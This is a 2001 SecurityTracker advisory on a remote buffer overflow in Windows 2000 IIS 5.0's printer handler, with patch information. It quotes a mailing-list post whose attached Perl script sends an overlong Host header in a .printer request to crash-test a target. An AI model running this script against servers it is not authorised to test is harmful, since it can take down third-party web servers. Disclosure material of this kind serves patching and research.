(A User Provides A Simple Test Script) Re: Microsoft Internet Information Server IIS 5.0 for Windows 2000 Lets Remote Users Execute Arbitrary Code on the Server and Gain Control of the Server
|
|
SecurityTracker Alert ID: 1001474 |
|
SecurityTracker URL: http://securitytracker.com/id/1001474
|
|
CVE Reference:
GENERIC-MAP-NOMATCH
(Links to External Site)
|
Date: May 3 2001
|
Impact:
Execution of arbitrary code via network, Root access via network
|
Exploit Included: Yes
|
Version(s): Microsoft Windows 2000 Internet Information Services 5.0, Microsoft Windows 2000 Internet Information Services 5.0 + Service Pack 1
|
Description:
eEye Digital Security reported a vulnerability in the Windows 2000 version of Internet Information Server 5.0. The security hole lets remote users execute arbitrary code on the server in the "system" context, which could allow the remote user to obtain system level access on the server.
A user has supplied a simple vulnerability test script. See the Source Message for the code.
|
Impact:
A remote user could cause the IIS web server to execute arbitrary code in the "system" context, which could allow the remote user to obtain system level access on the server (i.e., take complete control of the server).
|
Solution:
The vendor has released a fix and strongly recommends that all customers with affected servers apply the patch. See the Vendor URL for patch information.
|
Vendor URL: www.microsoft.com/technet/security/bulletin/ms01-023.asp (Links to External Site)
|
Cause:
Boundary error
|
Underlying OS:
Windows (2000)
|
|
Message History:
This archive entry is a follow-up to the message listed below.
|
Source Message Contents
|
Date: Wed, 2 May 2001 12:55:34 -0300
Subject: Re: Windows 2000 IIS 5.0 Remote buffer overflow vulnerability
|
This is a multi-part message in MIME format.
------=_NextPart_000_00D6_01C0D307.2D2364E0
Content-Type: text/plain;
charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
Hi Everyone,
I've coded a very simple vulnerability test, that actually causes
the memory leak but still don't have the shellcode to overwrite the EIP
register.
Cheers,
Wanderley
------=_NextPart_000_00D6_01C0D307.2D2364E0
Content-Type: application/octet-stream;
name="webexplt.pl"
Content-Transfer-Encoding: quoted-printable
Content-Disposition: attachment;
filename="webexplt.pl"
#!/usr/bin/perl
# Exploit By storm@stormdev.net
# Tested with sucess against Win2k IIS 5.0 + SP1
# Remote Buffer Overflow Test for Internet Printing Protocol=20
# This code was written after eEye brought this issue in BugTraq.
use Socket;
print "-- IPP - IIS 5.0 Vulnerability Test By Storm --\n\n";
if (not $ARGV[0]) {
print qq~
Usage: webexplt.pl <host>
~;=20
exit;}
$ip=3D$ARGV[0];
print "Sending Exploit Code to host: " . $ip . "\n\n";
my @results=3Dsendexplt("GET /NULL.printer HTTP/1.0\n" . "Host: =
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\n\n");
print "Results:\n";
if (not @results) {
print "The Machine tested has the IPP Vulnerability!";
}
print @results;
sub sendexplt {
my ($pstr)=3D@_;=20
$target=3D inet_aton($ip) || die("inet_aton problems");
socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0) ||
die("Socket problems\n");
if(connect(S,pack "SnA4x8",2,80,$target)){
select(S); =20
$|=3D1;
print $pstr; =20
my @in=3D<S>;
select(STDOUT);
close(S);
return @in;
} else { die("Can't connect...\n"); }
}
------=_NextPart_000_00D6_01C0D307.2D2364E0--
|
|
